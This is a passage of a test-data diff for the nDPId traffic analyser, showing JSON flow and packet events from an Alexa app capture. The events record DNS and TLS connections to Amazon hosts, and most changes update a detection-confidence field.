{"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01128{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01601{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1490976196840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976196840,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WmdAAEARM02sECrYrBAqAQqTADUAK8ZJ2BYBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1490976196938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976196938,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP7ApAAEARoZmsECoBrBAq2AA1CpMAO2jR2BaBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AARIFc55"} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 
-00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 
Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 
Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 